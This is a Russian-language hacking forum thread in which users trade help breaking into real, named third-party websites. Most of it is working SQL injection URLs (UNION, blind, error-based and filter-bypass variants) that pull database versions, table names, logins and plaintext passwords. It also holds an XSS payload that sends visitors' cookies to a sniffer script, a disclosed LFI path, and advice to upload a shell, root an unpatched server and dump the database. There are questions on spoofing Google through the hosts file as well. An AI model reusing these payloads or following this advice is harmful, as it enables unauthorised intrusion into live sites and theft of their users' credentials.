Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).

Интересное наблюдение:


Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.u ser_privileges--+

работает, а


Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.t ables--+

нет.

Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.

Boa said:

Code:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;

Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом.




img=new Image();


Пробел видишь ? Там после передачи будет стоять %20

А выглядеть он будет так :


img=new%20Image();


Чтобы там был пробел после передачи надо поставить +.

это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел

Вот например:


Code:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"

Decoy

Ну если первый запрос не сработал значит там нет таблиц отвечающих критерию запроса => нужно составить запрос по другому, пробуй захексить column_name=user

без процентиков, а вобще с линком былобы просще... сори больше не знаю что тебе посоветовать)

PS:проверь таблицы вставив в принтабельное поле count(*) фромь так же как в посте выше.

тупой вопрос, раньше их пропускал, а ща задумался.

Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?

zlo12 said:
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?


смотря какой фильтр, все зависит от кода

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version() ),0x71),0x71),4,5--+

->5.0.91-community

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_nam e),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20tabl e_schema='jain4_jain4jain' limit 1,1--+

Не обуви стол?

что тут можно сделать? 9 алертов вылезает.

http://www.unsigned.com/scriptalertscript

R0nin said:
Вот например:

Code:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"



Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло

Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.

Dare

/showpost.php?p=2243791&postcount=14265

Попробовал


Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table _schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+fr om+information_schema.columns+where+0x636F6C756D6E 5F6E616D653D75736572--+

Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?

Decoy said:
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал

Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table _schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+fr om+information_schema.columns+where+0x636F6C756D6E 5F6E616D653D75736572--+

Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?


Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?

Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ

Последний пост на эту тему!

Dare

Ссылка выше.

Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.

PS Постучал по ICQ.

Boa said:
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.


Надеюсь там есть уязвимость XSS-injection ?

Если что открой страницу кода и посмотри как он там передался.

почему это не показывают, введенный номер?

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+

haito said:
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+


http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring(version(),1,1)=5

крути как blind

PHP:
$server=mysql_real_escape_string($_GET["server_name"]);

$query=mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$server."' AND `expired`=0") or die (mysql_error());



Что можно сделать, что бы выдалась ошибка?

SeNaP said:

PHP:
$server=mysql_real_escape_string($_GET["server_name"]);

$query=mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$server."' AND `expired`=0") or die (mysql_error());



Что можно сделать, что бы выдалась ошибка?


да ничё какбы не сделаешь)

Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?

гаррет-тень said:
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?


изменение контекста страницы.

ex.

order+by+1 -- страница загружается

order+by+100 -- Пустая страница

Спасибо.

Пожалуйста, помогите как вводить этот сайт?

http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/alumni/html/queryTables.php on line 21


http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#

[QUOTE="happygirl"]
happygirl said:
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#

Как использовать уязвимость в SharePoint ??? Примерчик можно ...???

Привет

Есть SQL инъекция


Code:
site.ru/index.php&name=1'

Поле name уязвимо

Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0

Известно что база MS SQL

Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL

Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе

2Byrger

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

и т.д.

(c) scipio

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

/showthread.php?t=30501

http://hotflation.com/myprofile.php?uid=185+and+1=1

а вот тут что можно придумать?

durito said:
http://hotflation.com/myprofile.php?uid=185+and+1=1
а вот тут что можно придумать?


я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?

Version:5.1.47

User:hflation_hf@localhost

Database:hflation_hf

поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...

shell_c0de said:
2Byrger
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
и т.д.
(c) scipio
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
/showthread.php?t=30501


Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее

Сайт сообщает только о вверном или не верном запросе

Подскажите, как правильно настроить фейковую страничку www.google.ru

Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts

www.google.ru 1111.2222.3333.4444

http://google.ru/ 1111.2222.3333.4444

Все ровно попадаю на настоящую страничку www.google.ru

И. если можно дайте ссылку, как настроить фейковый DNS сервер.

Gorev said:
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?
Version:5.1.47
User:hflation_hf@localhost
Database:hflation_hf
поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...


ну зачем же сразу наезжать

я вот честно говоря не пойму, как ее раскручивать,

order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?

ну нуб я и что в этом плохого. кто нубом не был?

FlaktW said:
Подскажите, как правильно настроить фейковую страничку www.google.ru
Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts
www.google.ru 1111.2222.3333.4444
http://google.ru/ 1111.2222.3333.4444
Все ровно попадаю на настоящую страничку www.google.ru
И. если можно дайте ссылку, как настроить фейковый DNS сервер.


Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.

durito said:
ну зачем же сразу наезжать
я вот честно говоря не пойму, как ее раскручивать,
order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?
ну нуб я и что в этом плохого. кто нубом не был?


у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..

помогите кто с cfm


Code:
http://www.vaemergency.com/train/calendar_course.cfm?id=156

Seravin said:
помогите кто с cfm

Code:
http://www.vaemergency.com/train/calendar_course.cfm?id=156



http://www.vaemergency.com/train/calendar_course.cfm?id=156+or+1=@@version

стандартная MS_SQL инъекция

Code:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2, 3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19, 20,21+from+user

Какие идеи?

Seravin said:

Code:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2, 3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19, 20,21+from+user

Какие идеи?


почитай статью sql инъекция в ms access

таблица user зарезервирована ты не можешь сделать запрос к этой таблице

Есть вроде как уязвимость в Явовом сайте в пост параметре terms

Работает как через http так и через https


http://www.parship.de/profile/registration
forceDuplicatedEmail=false&mysex=1&essex=1&email=sample%40email%2Etst&password=test&passwordCheck=1&terms=%2527


Но так как я с явой не имел дело, не имею понятия как с ним обращаться, может кто подскажет?

R0nin said:
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.



Прочитал, и не понял где моя ошибка.

Давай настроим файл hosts для локального сервера. По дефолту там прописано:

127.0.0.1 localhost

Заменим слово "localhost" на "local.net"

127.0.0.1 local.net

Набираем в браузере http://local.net

Браузер выводит:

Error!

Could not locate remote server

Что можете предложить, чтобы локальный сервер заработал по этому адресу?

Есть ли способы залить шелл в (vBulletin 3.8.4) через админку администратора (не глав. администратора) ?

Если кто знает, дайте пожалуйста ссылку на видео или статью, спасибо.

FlaktW said:
Прочитал, и не понял где моя ошибка.


www.google.ru 1111.2222.3333.4444

где ты видел такие IP адреса?

Помогите с SQL-Inj, пожалуйста.

Подобрал кол-во столбцов, запросом

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Узнал данные о сервере

PHP Version 5.2.10

System FreeBSD fe61.hc.ru 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #2: Thu Apr 12 13:46:06 MSD 2007 root@fe25.hw.ru:/usr/obj/usr/src/sys/XEON i386

Mysql Client API version 4.1.22

Apache/1.3.34 (Unix)

Нашел багу:

site.ru/index.php?id=1'

Выдаёт

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in ****

Что еще можно вытянуть? и как? Подскажите, плз

смотрю что то очень страшные вопросы пошли =\

2Anexroid найти принтабельное поле и ..... прочитать это /thread43966.html и что то сделать своим умом ...

2f137ch линк в ПМ помогу с раскруткой а то тут телепаты в отпуске ...

Спс, нашел поле `email` только. =( Но за линк спс.

2shell_c0de

с aspx тяжеловато будет...

Anexroid said:
Спс, нашел поле `email` только. =( Но за линк спс.


Версия Mysql 4.1.22 намекает, что таблицы нужно брутить

UPD:

AC//DC

Не понял, думал сообщение относится к проблеме Anexroid.

Konqi said:
www.google.ru
1111.2222.3333.4444
где ты видел такие IP адреса?



Все правильно, но подставив даже любой существующий адрес, например:

255.255.255.255 www.google.ru

100.100.100.100 www.google.ru

150.150.150.150 www.google.ru

200.200.200.200 www.google.ru

в файле hosts, мы попадаем на настоящую страничку гугла, это ничего не меняет.

Всем спасибо, разобрался... Осталось только автоматизировать вытягивание email:ass.

Причем пасс - в открытом виде)

Anexroid said:
Всем спасибо, разобрался... Осталось только автоматизировать вытягивание email:
ass.
Причем пасс - в открытом виде)


- у тебя есть скуля

- не пропатченная фряха версии 6.2, под которую в паблике есть эксплойт

Есть все необходимые условия.

Заливай шелл через скуль, рутай серв, дампь базу.

Мешает то, что кавычки там экранируются((

Anexroid said:
Мешает то, что кавычки там экранируются((


Юзай SIPT4, брути таблицы, ищи админку. Xэксить названия таблиц она умеет (к теме об magic_quotes).

А вот это для меня уже не по русски... Я так понимаю утилита? =) И судя по описанию - сложная))

А она с POST-запросами работает? А то у меня не GET

Anexroid said:
А вот это для меня уже не по русски... Я так понимаю утилита? =) И судя по описанию - сложная))
А она с POST-запросами работает? А то у меня не GET


Работает.

http://www.sendspace.com/file/k8wqua

Мануал:

/thread40545.html

Установил, запустил, прочитал мануал. И нифига не понял как это работает.

Может кто нибудь на примере объяснить?

У формы action="?page=reg"

2 поля

допустим

login

pass

В логин я пишу 123

В пасс - 1 UNION ..........

Вывод есть у 4,5 и 6-го поля.

Как правильно вбить параметры в программу?

и где proxy вписывать, а то не нашел?

+ допустим точно знаю, что есть таблицы users и news

website is vulnerable

sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1

i use command order by and i got 23 columns but when i paste link in browser like this

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

page load normally and i can not see printable field

can help me what i am doing mistake

*.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

try to put(deliver) -

*.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

linuxkernal said:
website is vulnerable
sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
i use command order by and i got 23 columns but when i paste link in browser like this
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
page load normally and i can not see printable field
can help me what i am doing mistake



linuxkernel это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.

-------

linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted

Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...

вы издеваетесь что ли? я же написал выше, не писать на английском!!!!

linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда


winstrool said:
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...


для этих целей используют SIPT

Прошу помощи:

Нашел вроде скуль:

_http://dovidka.if.ua/rubric.php?id=86'

Но не могу подобрать колонки? в чем проблема?

boberko said:
Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?


http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7

Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pas s

помогите подобрать логин плз

Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1

Ошибка 403.

А вот так:


Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+

Работает.

Как обойти?

Seravin said:

Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pas s

помогите подобрать логин плз


http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min

haito said:

Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1

Ошибка 403.
А вот так:

Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+

Работает.
Как обойти?




Code:
http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+

всем привет!

-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

не могу найти принтабельное поле...

547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...


там нет ничего

547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...


можно вопрос? как вы узнали сколько там полей? спасибо.

Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.


да как всегда, через order by по выводу ошибки

-->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php

Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.


id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

Здесь есть второй под запрос.

http://www.mobilex.pl/istats5/login.php

http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!

я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo

Остальное за тобой.

AC//DC said:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min


чтобы всё так просто было не постил бы

Gorev said:
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..


вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты

Есть псивная xss в DLE.


site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert( String.fromCharCode(120,115,115))


При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит.

Почему не показывают версии?

http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sEle ct%20version%28%29+--+

happygirl said:
Почему не показывают версии?
http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sEle ct%20version%28%29+--+


http://www.catpaisatge.net/dossiers/jardins/eng/premsa2.php?idReg=-3307+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19

URL уязвима

http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086

не может рассчитывать колонны

Konqi said:
там нету уязвимости, это просто синтаксическая ошибка


Лучше не вводи в заблуждение народ, если не знаешь. Есть там инъект.


Code:
http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=5#

ошибка выводится


Code:
http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=777 #

Ошибки нет

Помогите раскрутить скулю.

http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+

а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.

Буду рад любым примерам, т.к. опыта маловато...

Вывод в ошибке.

auth_root said:
Помогите раскрутить скулю.
http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+
а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.
Буду рад любым примерам, т.к. опыта маловато...


http://banken.ruilen.nl/random.php?catid=473+and+substring(database(),1,1) =char(65)

и так далее

Konqi said:
http://banken.ruilen.nl/random.php?catid=473+and+substring(database(),1,1) =char(65)
и так далее


Версия пятая

http://banken.ruilen.nl/random.php?catid=473+and+ascii(lower(substring(ver sion(),1,1)))=53--+

зачем юзать подзапросы, есть же вывод... Я так месяц буду перебирать =(

Мне бы получить таблицы и колонки с information_schema.tables/columns раз версия пятая. а я чет не могу =\

Есть вывод ошибки. Зачем посимвольно?


Code:
http://banken.ruilen.nl/random.php?catid=473+and+row(1,1)%3E(select%20coun t(*),concat(version(),0x3a,floor(rand()*2))+x+from +(select+1+union+select+2)a+group+by+x+limit+1)#

The matrix said:
Есть вывод ошибки. Зачем посимвольно?


это просто один из методов

Konqi said:
это просто один из методов


Разумеется один из методов.

Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о

Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов).

Пойду коньяка жахну с горя.

The matrix said:
Разумеется один из методов.
Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о
Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов).
..............


Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным.

И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...

auth_root said:
Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным.
И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...


/thread119047.html

/thread19844.html

Byrger said:
Привет
Есть SQL инъекция

Code:
site.ru/index.php&name=1'

Поле name уязвимо
Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0
Известно что база MS SQL
Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL
Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе

добрый день!

Почему второй запрос появляется ошибка?

http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/*/+--+

-->5.1.47

http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/%20fRom/

**/information_schema.tables/**/wheRe/**/tAble_schema=dataBase()*/+--+

--> error 403

скорее всего просто доступа к informatio_schema нет

haito


Code:
http://www.filarmonika.com/book-description.php?pid=3+and+1=2+/*!union*/+select+1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_sc hema,TABLE_NAME)+SEPARATOR+0x3C62723E),5,6,7,8,9+f rom+information_schema.columns+where+column_name+l ike+0x257061737325+or+column_name+like+0x257025772 56425--+

таблица:abriledi_filarmonika:member_login

PS:admin-panel там под hataccessom, просто под юзером логинеться смысла нет ( там даже uploada нет, так что скуль гиблая, люди кто знает способы обхода хтаццесса подскажите )

Seravin

Не стоит вводить людей в заблуждение )

всем привет!

вот скуля:


Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+

админка:


Code:
_http://www.fcdinamokirov.ru/admin.php

как зайти в админку с помощью скуля?возможно ли?

boberko said:
всем привет!
вот скуля:

Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+

админка:

Code:
_http://www.fcdinamokirov.ru/admin.php

как зайти в админку с помощью скуля?возможно ли?



иди лучше и подумай что ты будешь писать в сочинение "Как я провел лето", вопрос тупее некуда... даже нубом обозвать тебя и то будет похвалой.. тебе бейсик авторизация говорит о чем нибудь?

упой вопрос, раньше их пропускал, а ща задумался.

Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?

Yetisports said:
упой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?



все зависит от скули...это как способ защиты..большинство помимо редиректа и другой арсенал используют для защиты...но попытка не пытка, бывало что канало лишь подзапросами...а бывало что и нормально работал запрос...

Gorev, невижу ничего смешного, в бд логин и пароль для доступа нету...


всем привет!
вот скуля:

Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+

админка:

Code:
_http://www.fcdinamokirov.ru/admin.php

как зайти в админку с помощью скуля?возможно ли?

boberko

http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,group_concat(nick,char(58),password),5,6,7+from+ users+--+

хотя не думаю что это таблица админов

Konqi

это таблица простых пользователей, я заходил все пашет...для админов не подходит(

в бд этих данных точно нету, все пересмотрел не нашел...

возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

boberko said:
Konqi
єто таблица простых пользователей, я заходил все пашет...для админов не подходит(
в бд этих данных точно нету, все пересмотрел не нашел...
возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?


если file_priv=Y и знаешь полный путь, то можешь читать файлы(скрипты, конфиги).

boberko said:
Gorev
, невижу ничего смешного, в бд логин и пароль для доступа нету...



какой нахрен смех? я тебе немекнул насчет бейсик авторизации...хоть погуглил бы перед тем как опять херню всякую постить...мде... знания участников форума с каждым днем стремительно уменьшаются...

где тот грей или джокестер, которые за такие вопросы из новичка делали чайника и ламера

Redwood said:
Есть ли способ передать GET запрос, чтобы в логах скобки не заменились на %3C %3E?


Кому передать ? Это ведь зависит от программы, как и каким способом сохраняет логи.

это таблица простых пользователей, я заходил все пашет...для админов не подходит( в бд этих данных точно нету, все пересмотрел не нашел... возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?


Что куда у тебя не подходит? все там норм просто админка под хтаццессом (

обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.

имхо: вопрос в разряд тупые )))

Горев реально прав, ребята давайте чуток читать )

Dare said:
Что куда у тебя не подходит? все там норм просто админка под хтаццессом (
обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.
имхо: вопрос в разряд тупые )))
Горев реально прав, ребята давайте чуток читать )


но если есть file_priv и знаешь путь к сайту то можно читать .htpasswd, а там лежат пароли(хеши(AFAIK md5(unix))) к .htaccess

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.


представим что ты прав, "инклудим" .htpasswd,

но это на сколько я знаю не script,a файл содержащий login:hash

и по твоему этот файл должен исполнятся?

